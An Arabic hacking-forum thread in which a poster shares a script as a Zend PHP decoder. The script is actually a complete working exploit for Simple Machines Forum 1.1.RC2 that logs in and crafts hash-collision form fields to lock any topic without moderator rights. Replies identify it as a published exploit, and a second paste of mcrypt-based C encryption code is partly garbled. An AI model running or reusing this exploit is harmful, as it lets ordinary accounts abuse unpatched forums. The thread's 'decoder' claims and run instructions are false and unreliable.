:{}::{}: حصريا طريقة فك تشفير الزند Dezender :{}:

[MtRp]

حصريااا ولاول مررررررررررررررررررررررررررررررة

الطريقة نزلت امس على موقعى روسى وانا اوواجه بعض المشاكل فى الفك بس الموضوع شكله صحيح

الطريقة

قم بنسخ الكود هدا وضعه فى ملف باسم red.pl

كود PHP:

#!/usr/bin/perl -w -d short_open_tag=on
print_r('
-------------------------------------------------------------------------------- 
Simple Machines Forum <= 1.1.RC2 "lock"/Zend_Hash_Del_Key_Or_Index Vulnerability
by rgod rgod@autistici.org
site: http://retrogod.altervista.org
dork, version specific: "Powered by SMF"
--------------------------------------------------------------------------------
');

if ($argc<6) {
print_r('
--------------------------------------------------------------------------------
Usage: php ".$argv[0]." host path user pass topic OPTIONS
host:       target server (ip/hostname)
path:       path to SMF
user/pass:  u need a valid user account
lock:       topic u want to lock
Options:
   -p[port]:    specify a port other than 80
   -P[ip:port]: specify a proxy
Examples:
php ".$argv[0]." localhost /smf/ user pass 4
php ".$argv[0]." localhost /smf/ user pass 3 -p81
php ".$argv[0]." localhost / user pass 7 -P1.1.1.1:80
--------------------------------------------------------------------------------
');
die;
}

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
    $c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
    }
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
  #debug
  #echo "\r\n".$html;
}
function my_encode($my_string)
{
  $encoded="";
  for ($k=0; $k<=strlen($my_string)-1; $k++)
  {
    $encoded.="chr(".ord($my_string[$k]);
    if ($k==strlen($my_string)-1) {$encoded.=")";}
    else {$encoded.=").";}
  }
  return $encoded;
}

function make_seed()
{
   list($usec, $sec) = explode(' ', microtime());
   return (float) $sec + ((float) $usec * 100000);
}

$host=$argv[1];
$path=$argv[2];
$user=$argv[3];
$pass=$argv[4];
$topic=(int)$argv[5];
$port=80;
$proxy="";

for ($i=3; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P"))
{$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

$data="user=".urlencode($user);
$data.="&passwrd=".urlencode($pass);
$data.="&cookielength=-1";
$data.="&hash_passwrd=";
$data.="&submit=Login";
$packet ="POST ".$p."index.php?action=login2 HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept-Language: en\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Cache-Control: no-cache\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
$temp=explode("Set-Cookie: ",$html);
$cookie="";
for ($i=1; $i<count($temp); $i++)
{
$temp2=explode(" ",$temp[$i]);
$cookie.=" ".$temp2[0];
}
echo "cookie -> ".$cookie."\r\n";
$temp=explode("PHPSESSID=",$cookie);
$temp2=explode(";",$temp[1]);
$sessid=$temp2[0];
echo "sessid -> ".$sessid."\r\n";
$temp=explode(";member=",$html);
$temp2=explode("\n",$temp[1]);
$uid=(int)$temp2[0];
echo "user id -> ".$uid."\r\n";

$packet="GET ".$p."index.php?action=post;topic=$topic.0;num_replies=1 HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
$temp=explode('name="sc" value="',$html);
$temp2=explode("\"",$temp[1]);
$sc=$temp2[0];
echo "sc code -> ".$sc."\r\n";
$temp=explode('"num_replies" value="',$html);
$temp2=explode("\"",$temp[1]);
$replies=$temp2[0];
echo "num replies -> ".$replies."\r\n";

$hash_1="173250926";
$hash_2="266332046";

$data='-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="topic"

'.$topic.'
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="subject"

I totally disagree, locked.
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="icon"

xx
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="message"

I totally disagree, locked.
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="notify"

0
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="lock"

1
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="'.$hash_1.'"

1
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="'.$hash_2.'"

1
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="sticky"

0
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="move"

0
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="attachment[]"; filename=""
Content-Type: application/octet-stream


-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="post"

Post
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="num_replies"

'.$replies.'
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="additional_options"

1
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="sc"

'.$sc.'
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="seqnum"

0
-----------------------------7d61bcd1f033e--
';

$packet="POST ".$p."index.php?action=post2;start=3;board=".$board." HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet.="X-FORWARDED-FOR: 1.1.1.1\r\n";
$packet.="Referer: http://".$host.$path."index.php?action=post;topic=1.0;num_replies=0\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d61bcd1f033e\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n";
$packet.="Cookie: ".$cookie."\r\n\r\n";
$packet.=$data;
sendpacketii($packet);

$packet= "GET ".$p."index.php?action=post;topic=$topic.0;num_replies=1 HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="X-FORWARDED-FOR: 1.1.1.1\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if  (strstr($html,"This topic is locked")) {echo "Exploit succeeded...";}
else {echo "Exploit failed...";}
?> 


طبعا الاسكربت يبى دعم cgi & perl

بعد ذلك اتبع التالى
اذهب الى Run

cmd ثم اكتب

وبعد ضلك نفذ الامر
perl red.pl c:/config.php مثلا او اي كان مصار الملف

ملحوظة :
config.php مسار الملف المراد فك تشفيره
red.pl الملف الموجود به الكود
الطريقة قيد التجربة وانا بجرب فيها الحين نظرا لعدم توفر البيرل فى جهازى فانا اقوم بتنزيله الان وتركيبه فى السيرفر

تحياتى
MtRp

[DES-T]

تسلم لي والله بس ماينفع افكه عن طريق اباتشي

[الغريم]

شرح لو سمحت ؟

[linux juggler]

بقراءة سريعة للكود ستجد أنه يحاول الدخول على أحد منتديات الـ SMF ، و هذا المنتدى أنت من تقوم بتحديد العنوان الخاص به ، و من ثمّ تستخدم اسم مستخدم و كلمة مرور ، تلك التي تستخدمها للدخول لهذا المنتدى ، و من ثمّ تقوم باقفال احد المواضيع الذي تحددها أنت أيضاً ..

و هذا الملف يستخدم ثغرة موجودة في الكور الخاص بـ Zend ( على ما أذكر ) ، راجع : http://www.hardened-php.net/hphp/zen...erability.html

و لا يقوم أبداً بعملية فك تشفير ...

[MtRp]

بقراءة سريعة للكود ستجد أنه يحاول الدخول على أحد منتديات الـ SMF ، و هذا المنتدى أنت من تقوم بتحديد العنوان الخاص به ، و من ثمّ تستخدم اسم مستخدم و كلمة مرور ، تلك التي تستخدمها للدخول لهذا المنتدى ، و من ثمّ تقوم باقفال احد المواضيع الذي تحددها أنت أيضاً ..

و هذا الملف يستخدم ثغرة موجودة في الكور الخاص بـ Zend ( على ما أذكر ) ، راجع : http://www.hardened-php.net/hphp/zen...erability.html

و لا يقوم أبداً بعملية فك تشفير ...

غريبة
انا شوفت واحد فك ملف وظهر بهذا الشكل :

[PHP]

كود PHP:

/* ecb.c-------------------cut here-----------*/ 
/* encrypt for php source code version 0.99 beta 
we are using libmcrypt to encrypt codes, please 
install it first. 
compile command line: 
gcc -O6 -lmcrypt -lm -o encryptphp ecb.c 
please set LD_LIBRARY_PATH before use. 
GNU copyleft, designed by wangsu , miweicong */ 
 
#define MCRYPT_BACKWARDS_COMPATIBLE 1 
#define PHP_CACHESIZE 8192 
#include < mcrypt.h > 
#include < stdio.h > 
#include < stdlib.h > 
#include < math.h > 
#include < sys/types.h > 
#include < sys/stat.h > 
#include < fcntl.h > 
 
 
main(int argc, char** argv) 
{ 
 
int td, i,j,inputfilesize,filelength; 
char filename[255]; 
char password[12]; 
FILE* ifp; 
int readfd; 
char *key; 
void *block_buffer; 
void *file_buffer; 
int keysize; 
int decode=0; 
int realbufsize=0; 
struct stat *filestat; 
 
 
if(argc == 3) { 
strcpy(password,argv[1]); 
strcpy(filename,argv[2]); 
} else if(argc == 4 && !strcmp(argv[1],"-d")){ 
strcpy(password,argv[2]); 
strcpy(filename,argv[3]); 
decode=1; 
printf("Entering decode mode ... n"); 
} else { 
printf("Usage: encryptphp [-d] password filenamen"); 
exit(1); 
} 
 
 
keysize=mcrypt_get_key_size(DES); 
key=calloc(1, mcrypt_get_key_size(DES)); 
 
gen_key_sha1( key, NULL, 0, keysize, password, strlen(password)); 
td=init_mcrypt_ecb(DES, key, keysize); 
 
if((readfd=open(filename,O_RDONLY,S_IRUSR|S_IWUSR|S_IRGRP))==-1){ 
printf("FATAL: Can't open file to read"); 
exit(3); 
} 
 
filestat=malloc(sizeof(stat)); 
 
fstat(readfd,filestat); 
inputfilesize=filestat- >st_size; 
printf("filesize is %d n",inputfilesize); 
filelength=inputfilesize; 
 
inputfilesize=((int)(floor(inputfilesize/PHP_CACHESIZE))+1)*PHP_CACHESIZE; 
 
if((file_buffer=malloc(inputfilesize))==NULL){ 
printf("FATAL: can't malloc file buffer.n"); 
exit(2); 
} 
if((block_buffer=malloc(PHP_CACHESIZE))==NULL){ 
printf("FATAL: can't malloc encrypt block buffer.n"); 
exit(2); 
} 
 
j=0; 
while(realbufsize=read (readfd,block_buffer, PHP_CACHESIZE)){ 
printf("."); 
if(!decode){ 
if(realbufsize< PHP_CACHESIZE){ 
for(i=realbufsize;i< PHP_CACHESIZE;i++){ 
((char *)block_buffer)=' '; 
} 
} 
mcrypt_ecb (td, block_buffer, PHP_CACHESIZE); 
} else { 
mdecrypt_ecb (td, block_buffer, realbufsize); 
} 
memcpy(file_buffer+j*PHP_CACHESIZE,block_buffer,PHP_CACHESIZE); 
j++; 
} 
 
close(readfd); 
 
if((ifp=fopen(filename,"wb"))==NULL){ 
printf("FATAL: file access error.n"); 
exit(3); 
} 
fwrite ( file_buffer, inputfilesize, 1, ifp); 
 
free(block_buffer); 
free(file_buffer); 
free(filestat); 
fclose(ifp); 
printf("n"); 
 
return 0; 
 
} 
/*--- end of ecb.c ------------------------------------*/ 
 
&#12288;因为ECB模式是块长度确定的块加密，这里填充了一 些空字符。 
 
&#12288;　然后，修改php代码中 Zend/zend-scanner.c 如下： 
 
(&#25105;的php版本是4.01pl2, SUNsparc/solaris 2.7, gcc 2.95;) 
 
&#25991;件前加入: 
 
#define MCRYPT_BACKWARDS_COMPATIBLE 1 
#include < mcrypt.h > 
 
&#12288;　然后，注释掉大约3510行前后的YY_INPUT的定义。 
 
&#12288;　然后， 修改大约5150行前后的yy_get_next_buffer()函数： 
&#20989;数头加上定义： 
void *tempbuf; 
char *key; 
char debugstr[255]; 
int td,keysize; 
int x,y; 
FILE *fp; 
&#28982;后 ，注释掉 
YY_INPUT( (&yy_current_buffer- >yy_ch_buf[number_to_move]), 
yy_n_chars, num_to_read ); 
&#36825;一句。 
&#25913;为： 


اخوى لو متاكد انه ما بيفك اخبرنى حتى اقوم بمسح الموضوع
تحياتى

[linux juggler]

بصراحة لقد قرأت الكود و لم يكن به أي اشارة إلى عملية فك التشفير ، و إنما يقوم بالعملية السابقة التي تحدثت عنها ..
الأمر الآخر :
الملف الذي وضعته ، بحسب قراءة سريعة و من الذكريات ، فهو كود سي C أو ++C و ليس PHP ...

و هو عبارة عن كود لبرنامج يقوم بتشفير ملفات البي اتش بي اعتماداً على http://mcrypt.sourceforge.net ...

و لكن من الممكن ان تستشير ، فكل ابن آدم خطاء ، و قد أكون مخطئ في قرائتي و ترجمتي للكود البرمجي ...

بالنهاية جميعنا بشر ، لكن كما كنت أقول و أقولها عن اقتناع بأن الملفات التي ذكرتها تقوم بالتالي :
الملف الأول يقوم بعملية اغلاق أحد المواضيع في منتدى SMF بالاعتماد على معلومات مستخدم عادي ، دون أن يمتلك المستخدم اي صلاحيات ...
الملف الثاني : و هو مكتوب بلغة السي أو السي ++ ، فيقوم بعملية تشفير بالاعتماد على ، http://mcrypt.sourceforge.net ، و من التعليقات يمكنك قراءة encrypt for php source code version 0.99 beta ، أي انه في المرحلة التجريبية و لم يصل للنسخة الأولى منه ، و بالنظر إلى المعلومات المزودة منه أقول أنه سيكون مرخصاً تحت ترخيص GNU GPL ، حيث أن الأول يعتمد عليها ...

[ThE Spirit]

هههههههههههههههههههههههه

يا اخوي هذي ثغره لواحد اسمه rgod

في منتديات simple machines

و بها تقدر تقفل اي موضوع ..


و اخر تحديث لهالسكربت هو RC3
و تم ترقيع الثغره فيه ..

و هذي احد الروابط للثغره بمواقع السكيورتي:
http://milw0rm.com/exploits/2243


و بالنسبه للبس اللي صار عندك بخصوص هالسطر:
Zend_Hash_Del_Key_Or_Index

تابع هالرابط :
http://www.hardened-php.net/hphp/zen...erability.html
و ان شاء الله تفهم السالفه ..


سلام

[Dea]

شكراُ أخي MtRp على الموضوع وودنا نعرف الطريقة لكن للأسف محتكرة


وياخبر اليوم بفلوس بكرة بلاش

[شبكة المدار]

دخلنا من الغرب وطلعنا من الشرق

من فك تشفير الى ثغرات بالمنتديات

[الوداع]

لا تتعب نفسك الموضوع اعتقد انه اكبر من مجرد ملف
لازم يكون برنامج بقوه برنامج التشفير

عموما لو تبي تفك مالك الا
موقع عربي www.dezend.net
موقع صيني www.zendecode.com
وفي موقع ثالث لكن مانى متذكره ..

[Undying]

ما الحل بالأخير ؟؟ ....

لم أفهم القصة أبداً .....




ننتظر عملاق الفك besho
..

[MaRWaN]

ياشيخ لو واحد منا عنده لغة صينية كان عرف طريقة الفك من زماااااااااااااان

[أبوبسام]

ياخبر اليوم بفلووووووس بكرة ببلااااااااش

[beshoo]

صدقا اضحك من قلبي عندما يظن احد ان الطريقة سهلة لدرجة انها بملف واحد لا حتى بدون وجود الزيند ابوتيمايزر الذي هو اسساس اللعبة ..
الموضوع سيرفر بحالة + تعديل على 18 ملف DLL خاصة بالسيرفر الاباتشي و ال php.

مع التحية وصيام مبارك .

[alwoolf]

هوس فك التشفير سيطر على عقولكم !!

Zend Engine HashTables

مادخله في تشفير الزنداا لملفات الـ php ؟


انا لاادري لماذا ارد على الموضوع برغم ان الاخ ThE Spirit وضح انها ثغره ووضع كافه الوصلات لهذا الشي لكن البقيه لم يكترثو وااكملو الموضوع !!

شيء غريب فعلا